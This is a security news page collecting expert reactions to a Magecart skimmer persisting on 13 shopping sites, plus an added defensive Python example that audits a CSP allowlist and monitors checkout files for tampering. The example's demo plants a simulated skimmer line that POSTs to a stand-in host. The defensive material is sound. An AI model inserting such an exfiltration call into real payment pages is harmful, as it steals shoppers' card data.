Experts Reaction On Credit Card Skimmer Running On 13 Shopping Sites, Despite Notification

In a blog post today, researchers published the dates for nearly 40 new shopping websites infected by Magecart 12 with JavaScript. All were notified of the compromise, yet 13 continued to load the malicious JavaScript.

Experts' Comments

February 26, 2020
Tarik Saleh
Senior Security Engineer and Malware Researcher
DomainTools
Magecart continues to be a successful JavaScript-based malware that steals customer payment information. Magecart is uploaded to your website only after it has been compromised via some other means, like an XSS (Cross-Site Scripting) vulnerability or an RCE (Remote Code Execution) exploit. With that in mind, if you own a business that handles customer credit cards or payment information there are several things you can do to detect and prevent Magecart from affecting you. The most clear and obvious is ensuring your operating system and the web frameworks used by your public-facing website are fully patched. This will help prevent common exploits that may be affecting versions used by your website. Secondly, it's important to adjust your web application's Content Security Policy (CSP) to allow scripts running on it to be from your specific whitelisted domains. Thirdly, I recommend deploying a File Integrity Monitoring (FIM) solution to your website's directory containing the scripts used for the checkout or payment handling process. FIM solutions are great for monitoring when files have been tampered with or added to your website, and in this case it won't prevent you from being compromised, but it will let you know if Magecart has been installed.
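The CSP allowlist and file-integrity checks described in the comment above, as an added example that is not part of the original comment and is not DomainTools code: a `script-src` allowlist is rendered as a header and applied to the script sources a checkout page actually loads, and a SHA-256 baseline of the checkout script directory is compared after a simulated tampering. The host names (`shop.example.com`, `js.example-psp.com`, `cdn-static-assets.example.net`), file names and file contents are all constructed for illustration.

```python
"""Added example: CSP script-src allowlist audit and a file-integrity baseline
for a checkout directory. Hosts, file names and contents are constructed."""
import hashlib
import os
import tempfile
from urllib.parse import urlparse

# Constructed allowlist: only first-party scripts and the payment provider's
# script host may run on the checkout page. No 'unsafe-inline', so an injected
# inline skimmer is blocked as well as one loaded from a rogue host.
CSP_SCRIPT_SRC = ["'self'", "https://js.example-psp.com"]

# Constructed: script sources a crawler found on /checkout. The third entry
# stands in for a skimmer host, the fourth for an injected inline <script>.
CHECKOUT_SCRIPTS = [
    "https://shop.example.com/js/checkout.js",
    "https://js.example-psp.com/v3/payment.js",
    "https://cdn-static-assets.example.net/jquery.min.js",
    "inline",
]


def csp_header(script_src):
    """Render a Content-Security-Policy header value from a script-src list."""
    return "script-src " + " ".join(script_src) + "; object-src 'none'; base-uri 'self'"


def script_allowed(script_url, page_origin, script_src):
    """Approximate the browser's script-src matching for one script.

    Handles 'self' (same scheme and host:port as the page), exact origins,
    scheme-less hosts and '*.' wildcard hosts. "inline" models an inline
    <script>, which only 'unsafe-inline' would permit.
    """
    if script_url == "inline":
        return "'unsafe-inline'" in script_src
    u = urlparse(script_url)
    p = urlparse(page_origin)
    for src in script_src:
        if src == "'self'":
            if (u.scheme, u.netloc) == (p.scheme, p.netloc):
                return True
            continue
        # A bare host like "cdn.example.org" needs "//" for urlparse to see a netloc.
        s = urlparse(src if "://" in src else "//" + src)
        if s.scheme and s.scheme != u.scheme:
            continue
        if s.netloc.startswith("*."):
            # Wildcard matches subdomains only, not the bare domain itself.
            if u.hostname and u.hostname.endswith(s.netloc[1:]):
                return True
        elif s.netloc == u.netloc:
            return True
    return False


def audit_scripts(page_origin, script_urls, script_src=CSP_SCRIPT_SRC):
    """Return the script sources the policy would block on this page."""
    return [url for url in script_urls if not script_allowed(url, page_origin, script_src)]


def sha256_file(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(directory):
    """Map relative path -> SHA-256 for every file under directory."""
    result = {}
    for root, _, files in os.walk(directory):
        for name in files:
            full = os.path.join(root, name)
            result[os.path.relpath(full, directory)] = sha256_file(full)
    return result


def diff_baseline(old, new):
    """Classify changes between two baselines as added, removed or modified."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in old.keys() & new.keys() if old[p] != new[p]),
    }


def demo_fim():
    """Snapshot a throwaway checkout directory, tamper with it, re-check."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "checkout.js"), "w") as f:
            f.write("// constructed first-party checkout code\n")
        before = baseline(d)
        # Simulated skimmer: append exfiltration code to an existing file
        # and drop a new file with a benign-looking name.
        with open(os.path.join(d, "checkout.js"), "a") as f:
            f.write("fetch('https://cdn-static-assets.example.net/c',{method:'POST'});\n")
        with open(os.path.join(d, "jquery.min.js"), "w") as f:
            f.write("// constructed dropped file\n")
        return diff_baseline(before, baseline(d))


if __name__ == "__main__":
    print(csp_header(CSP_SCRIPT_SRC))
    print("blocked:", audit_scripts("https://shop.example.com", CHECKOUT_SCRIPTS))
    print("fim:", demo_fim())
```

The CSP audit is a static check over a page's script inventory, not a substitute for the browser enforcing the header; its value is in catching an allowlist that is broader than the checkout page needs. The FIM baseline must be stored somewhere the web server's user cannot write, or an attacker who can drop a skimmer can also rewrite the baseline.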
February 26, 2020
Ameet Naik
Security Evangelist
PerimeterX
Businesses often leverage third-party platforms and services to take their brands online. When a Magecart infection is discovered, they can lack the processes or resources to engage their third-party vendors to patch their e-commerce stores and mitigate their risk of a data breach. PerimeterX research shows that Magecart attacks often remain active on websites for weeks or even months, compromising hundreds of thousands of credit card numbers in the process. Magecart activity is approaching fever pitch as attack techniques and tools are widely shared amongst hackers. PerimeterX researchers continue to uncover new Magecart infections, and multiple simultaneous infections in some cases. Despite proactive notifications to the site administrators, we see the infections continue to persist for months. While it helps to stay current with security patches and software updates, businesses need to invest in client-side visibility solutions that will proactively alert them about Magecart attacks, and drastically shorten the mean time to mitigation.